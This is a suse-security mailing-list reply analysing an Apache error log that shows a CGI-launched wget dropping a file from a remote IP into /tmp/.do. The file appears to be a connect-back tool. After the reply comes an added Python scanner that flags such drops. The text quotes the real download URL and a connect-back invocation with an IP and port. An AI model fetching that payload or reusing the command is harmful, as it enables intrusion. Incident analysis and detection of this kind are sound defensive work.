
[suse-security] Re: Backdoor over http(s)??



On Tue, Jan 13, 2004 at 01:54:18PM +0100, Mátyás Tibor wrote:

> I have found in /var/log/httpd/error.log
> 
> --09:06:43--  http://218.234.171.84/manual/.x/rhs
>            => `/tmp/.do'

Some CGI at your webserver did run wget to receive some file from
218.234.171.84 and save it on your disc as "/tmp/.do".
wwwrun:nogroup are the standard user and group used for Apache.

The file is still available from http://218.234.171.84/manual/.x/rhs
I don't want to execute it, but strings does list some information:

usage: %s <IP or hostname> <port>

(/tmp/.do 163.17.51.8 9090)


> connect error

probably an error message printed by /tmp/.do.

The server at 218.234.171.84 identifies itself as Apache/1.3.9 (Old!)



-- 
Stefan Tichy <listuser@xxxxxxxxx>
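The two lines quoted from error.log above are wget's download transcript (the `--HH:MM:SS--  URL` line followed by the `=> \`destination'` line), written to stderr by a CGI-spawned wget and captured by Apache. The following is an added example, not code from the thread or from either poster: a small scanner that pairs those two lines and flags downloads that land in a world-writable scratch directory, use a dot-prefixed (hidden) filename, or come from a bare IP address or a hidden directory on the source server, all of which the dropped `/tmp/.do` exhibits. The sample log is constructed for the example; only the two wget lines are taken from the thread, and the client IP, hostname and the "Premature end of script headers" line are made up.

```python
import re
from typing import Dict, List, Optional

# wget writes its download transcript to stderr, which Apache's error_log
# captures when a CGI script spawns it:
#   --HH:MM:SS--  http://host/path
#              => `/local/destination'
WGET_START = re.compile(r"^--(?P<time>\d{2}:\d{2}:\d{2})--\s+(?P<url>\S+)\s*$")
WGET_DEST = re.compile(r"^\s*=>\s*`(?P<dest>[^']+)'\s*$")

# World-writable staging directories commonly used for dropped files.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample log. The two wget lines are the ones quoted in the thread;
# the other lines (client IP, hostname, script name) are invented for the example.
SAMPLE_ERROR_LOG = """\
[Tue Jan 13 09:06:40 2004] [error] [client 10.0.0.5] Premature end of script headers: /cgi-bin/example.cgi
--09:06:43--  http://218.234.171.84/manual/.x/rhs
           => `/tmp/.do'
connect error
--09:10:02--  http://mirror.example.net/pub/notes.txt
           => `/srv/www/htdocs/notes.txt'
""".splitlines()


def parse_wget_transcripts(lines: List[str]) -> List[Dict[str, str]]:
    """Pair each '--time-- URL' line with the '=> `dest'' line that follows it."""
    found: List[Dict[str, str]] = []
    pending: Optional[Dict[str, str]] = None
    for line in lines:
        m = WGET_START.match(line)
        if m:
            # A new transcript starts; any unpaired previous start is dropped.
            pending = {"time": m.group("time"), "url": m.group("url")}
            continue
        m = WGET_DEST.match(line)
        if m and pending is not None:
            pending["dest"] = m.group("dest")
            found.append(pending)
            pending = None
    return found


def suspicious_reasons(entry: Dict[str, str]) -> List[str]:
    """Return the indicators that make a fetched file look like a dropped tool."""
    reasons: List[str] = []
    dest, url = entry["dest"], entry["url"]
    if dest.startswith(SCRATCH_DIRS):
        reasons.append("destination in world-writable scratch directory")
    if dest.rsplit("/", 1)[-1].startswith("."):
        reasons.append("hidden (dot-prefixed) destination filename")
    if re.match(r"^https?://\d{1,3}(\.\d{1,3}){3}/", url):
        reasons.append("download from a bare IP address")
    if "/." in url.split("://", 1)[-1]:
        reasons.append("hidden directory in source path")
    return reasons


def find_dropped_files(lines: List[str]) -> List[Dict[str, object]]:
    """Scan an error_log for wget downloads that carry at least one indicator."""
    hits: List[Dict[str, object]] = []
    for entry in parse_wget_transcripts(lines):
        reasons = suspicious_reasons(entry)
        if reasons:
            hits.append({**entry, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_dropped_files(SAMPLE_ERROR_LOG):
        print(f"{hit['time']} {hit['url']} -> {hit['dest']}")
        for reason in hit["reasons"]:
            print(f"    {reason}")
```

Run against a real error_log with `find_dropped_files(open("/var/log/httpd/error.log").read().splitlines())`; the benign download to the document root in the sample is parsed but not reported, while the `/tmp/.do` drop is reported with all four indicators.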
